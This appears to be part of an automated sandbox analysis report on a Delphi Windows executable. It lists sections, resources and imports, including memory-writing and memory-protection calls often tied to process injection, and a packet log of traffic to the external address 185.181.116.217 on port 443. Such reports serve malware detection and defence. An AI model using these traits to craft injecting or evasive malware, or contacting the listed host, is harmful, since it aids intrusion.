IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
CODE	0x1000	0x5f4ac	0x5f600	False	0.5256773222477065	data	6.542264285948502	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
DATA	0x61000	0x8acb4	0x8ae00	False	0.666159780040504	data	7.527713167200616	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
BSS	0xec000	0xd15	0x0	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0xed000	0x232c	0x2400	False	0.3628472222222222	data	4.971041857999194	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0xf0000	0x10	0x0	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0xf1000	0x18	0x200	False	0.05078125	data	0.15842690200323517	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.reloc	0xf2000	0x6c0c	0x6e00	False	0.6440340909090909	data	6.682368392261621	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.rsrc	0xf9000	0xd600	0xd600	False	0.1875	data	3.9582855006976745	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_CURSOR	0xf9e98	0x134	Targa image data - Map 64 x 65536 x 1 +32 "\001"			0.38636363636363635
RT_CURSOR	0xf9fcc	0x134	data			0.4642857142857143
RT_CURSOR	0xfa100	0x134	data			0.4805194805194805
RT_CURSOR	0xfa234	0x134	data			0.38311688311688313
RT_CURSOR	0xfa368	0x134	data			0.36038961038961037
RT_CURSOR	0xfa49c	0x134	data			0.4090909090909091
RT_CURSOR	0xfa5d0	0x134	Targa image data - RGB 64 x 65536 x 1 +32 "\001"			0.4967532467532468
RT_BITMAP	0xfa704	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360			0.43103448275862066
RT_BITMAP	0xfa8d4	0x1e4	Device independent bitmap graphic, 36 x 19 x 4, image size 380			0.46487603305785125
RT_BITMAP	0xfaab8	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360			0.43103448275862066
RT_BITMAP	0xfac88	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360			0.39870689655172414
RT_BITMAP	0xfae58	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360			0.4245689655172414
RT_BITMAP	0xfb028	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360			0.5021551724137931
RT_BITMAP	0xfb1f8	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360			0.5064655172413793
RT_BITMAP	0xfb3c8	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360			0.39655172413793105
RT_BITMAP	0xfb598	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360			0.5344827586206896
RT_BITMAP	0xfb768	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360			0.39655172413793105
RT_BITMAP	0xfb938	0xc0	Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colors			0.5208333333333334
RT_BITMAP	0xfb9f8	0xe0	Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors			0.42857142857142855
RT_BITMAP	0xfbad8	0xe0	Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors			0.4955357142857143
RT_BITMAP	0xfbbb8	0xe0	Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors			0.38392857142857145
RT_BITMAP	0xfbc98	0xc0	Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colors			0.4947916666666667
RT_BITMAP	0xfbd58	0xc0	Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colors			0.484375
RT_BITMAP	0xfbe18	0xe0	Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors			0.42410714285714285
RT_BITMAP	0xfbef8	0xc0	Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colors			0.5104166666666666
RT_BITMAP	0xfbfb8	0xe0	Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors			0.5
RT_BITMAP	0xfc098	0xe8	Device independent bitmap graphic, 16 x 16 x 4, image size 128	English	United States	0.4870689655172414
RT_BITMAP	0xfc180	0xc0	Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colors			0.4895833333333333
RT_BITMAP	0xfc240	0xe0	Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors			0.3794642857142857
RT_ICON	0xfc320	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors			0.2355595667870036
RT_ICON	0xfcbc8	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors			0.2805299539170507
RT_ICON	0xfd290	0x3a48	Device independent bitmap graphic, 60 x 120 x 32, image size 14880			0.052815013404825736
RT_ICON	0x100cd8	0x1a68	Device independent bitmap graphic, 40 x 80 x 32, image size 6720			0.09186390532544379
RT_ICON	0x102740	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400			0.20081967213114754
RT_ICON	0x1030c8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088			0.3182624113475177
RT_DIALOG	0x103530	0x52	data			0.7682926829268293
RT_STRING	0x103584	0x308	data			0.43943298969072164
RT_STRING	0x10388c	0x1f0	data			0.4213709677419355
RT_STRING	0x103a7c	0x1c0	data			0.44419642857142855
RT_STRING	0x103c3c	0xdc	data			0.6
RT_STRING	0x103d18	0x2f4	data			0.4497354497354497
RT_STRING	0x10400c	0xdc	data			0.5863636363636363
RT_STRING	0x1040e8	0x10c	data			0.5746268656716418
RT_STRING	0x1041f4	0x33c	data			0.4311594202898551
RT_STRING	0x104530	0x3d4	data			0.3683673469387755
RT_STRING	0x104904	0x3a4	data			0.34763948497854075
RT_STRING	0x104ca8	0x3e8	data			0.384
RT_STRING	0x105090	0xf4	data			0.47540983606557374
RT_STRING	0x105184	0xc4	data			0.5663265306122449
RT_STRING	0x105248	0x2c0	data			0.4446022727272727
RT_STRING	0x105508	0x478	data			0.2928321678321678
RT_STRING	0x105980	0x3ac	data			0.37553191489361704
RT_STRING	0x105d2c	0x2d4	data			0.4046961325966851
RT_RCDATA	0x106000	0x10	data			1.5
RT_RCDATA	0x106010	0x368	data			0.6938073394495413
RT_RCDATA	0x106378	0x129	Delphi compiled form 'TForm1'			0.7878787878787878
RT_GROUP_CURSOR	0x1064a4	0x14	Lotus unknown worksheet or configuration, revision 0x1			1.25
RT_GROUP_CURSOR	0x1064b8	0x14	Lotus unknown worksheet or configuration, revision 0x1			1.25
RT_GROUP_CURSOR	0x1064cc	0x14	Lotus unknown worksheet or configuration, revision 0x1			1.3
RT_GROUP_CURSOR	0x1064e0	0x14	Lotus unknown worksheet or configuration, revision 0x1			1.3
RT_GROUP_CURSOR	0x1064f4	0x14	Lotus unknown worksheet or configuration, revision 0x1			1.3
RT_GROUP_CURSOR	0x106508	0x14	Lotus unknown worksheet or configuration, revision 0x1			1.3
RT_GROUP_CURSOR	0x10651c	0x14	Lotus unknown worksheet or configuration, revision 0x1			1.3
RT_GROUP_ICON	0x106530	0x5a	data			0.8222222222222222

Imports

DLL	Import
kernel32.dll	DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetTickCount, QueryPerformanceCounter, GetVersion, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
user32.dll	GetKeyboardType, LoadStringA, MessageBoxA, CharNextA
advapi32.dll	RegQueryValueExA, RegOpenKeyExA, RegCloseKey
oleaut32.dll	SysFreeString, SysReAllocStringLen, SysAllocStringLen
kernel32.dll	TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
advapi32.dll	RegQueryValueExA, RegOpenKeyExA, RegCloseKey
kernel32.dll	lstrcpyA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualProtect, VirtualAlloc, Sleep, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MultiByteToWideChar, MulDiv, LockResource, LoadResource, LoadLibraryExA, LoadLibraryW, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalReAlloc, GlobalHandle, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetSystemInfo, GetStringTypeExA, GetStdHandle, GetProcAddress, GetModuleHandleW, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCurrentProcess, GetComputerNameA, GetCPInfo, GetACP, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, ExitProcess, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
version.dll	VerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
gdi32.dll	UnrealizeObject, StretchBlt, SetWindowOrgEx, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, RectVisible, RealizePalette, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetPixel, GetPaletteEntries, GetObjectA, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, ExcludeClipRect, DeleteObject, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, BitBlt
user32.dll	CreateWindowExA, WindowFromPoint, WinHelpA, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCursor, SetWindowsHookExA, SetWindowPos, SetWindowPlacement, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageA, OffsetRect, OemToCharA, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowEnabled, IsWindow, IsRectEmpty, IsMenu, IsIconic, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClientRect, GetClassNameA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerA, CharUpperBuffA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
kernel32.dll	Sleep
oleaut32.dll	SafeArrayPtrOfIndex, SafeArrayPutElement, SafeArrayGetElement, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopyInd, VariantCopy, VariantClear, VariantInit
ole32.dll	CoTaskMemFree, ProgIDFromCLSID, StringFromCLSID, CoCreateInstance, CoUninitialize, CoInitialize, IsEqualGUID
oleaut32.dll	GetErrorInfo, GetActiveObject, SysFreeString
comctl32.dll	ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_SetDragCursorImage, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Add, ImageList_SetImageCount, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create
ntdll	NtWriteVirtualMemory, NtProtectVirtualMemory
uRL	TelnetProtocolHandler
ntdll	NtQueryInformationFile, NtOpenFile, NtClose, NtReadFile
ntdll	RtlDosPathNameToNtPathName_U

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 23, 2023 19:30:31.856199980 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:31.856302977 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:31.856439114 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:31.889179945 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:31.889261007 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:31.974450111 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:31.974618912 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:31.979082108 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:31.979120016 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:31.979728937 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:32.130261898 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.594521999 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.629255056 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.662327051 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.662370920 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.662446022 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.662498951 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.662524939 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.662533045 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.662579060 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.662580967 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.662605047 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.662640095 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.662663937 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.662926912 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.662955999 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.663012981 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.663037062 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.663048029 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.663074970 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.663110018 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.663129091 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.663132906 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.695588112 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.695688963 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.695704937 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.695725918 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.695811033 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.695856094 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.695880890 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.696049929 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.696084023 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.696108103 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.696125984 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.696141005 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.696145058 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.696171045 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.728323936 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.728396893 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.728578091 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.728650093 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.728714943 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.728774071 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.728842974 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.728864908 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.728873014 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.728919029 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.728950024 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.729008913 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.729062080 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.729089975 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.729110956 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.729135990 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.729553938 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.729598999 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.729657888 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.729684114 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.729707003 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.730218887 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.730271101 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.730308056 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.730340004 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.730361938 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.730953932 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.730999947 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.731040001 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.731065989 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.731089115 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.764477015 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.764553070 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.764658928 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.764714003 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.764741898 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.765156031 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.765201092 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.765235901 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.765260935 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.765290022 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.765979052 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.766033888 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.766077042 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.766103983 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.766128063 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.766767979 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.766817093 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.766855001 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.766876936 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.766904116 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.767668962 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.767731905 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.767764091 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.767797947 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.767827034 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.768452883 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.768517971 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.768565893 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.768596888 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.768624067 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.769231081 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.769292116 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.769352913 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.769397974 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.769422054 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.769776106 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.769819975 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.769859076 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.769875050 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.769896984 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.789217949 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.805114031 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.805216074 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.805401087 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.805401087 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.805457115 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.805500984 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.805500984 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.805510998 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.805593014 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.805620909 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.805685043 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.805731058 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.805767059 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.805799961 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.805838108 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.837351084 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.837424040 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.837524891 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.837558031 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.837588072 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.837629080 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.837635994 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.837662935 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.837677956 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.837698936 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.837779999 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.837826967 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.837845087 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.837862015 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.837897062 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.837938070 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.837986946 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.838043928 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.838066101 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.838080883 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.838378906 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.838433027 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.838470936 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.838490009 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.838507891 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.839059114 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.839107037 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.839171886 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.839186907 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.839204073 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.839273930 CEST	49727	443	192.168.2.3	185.181.116.217
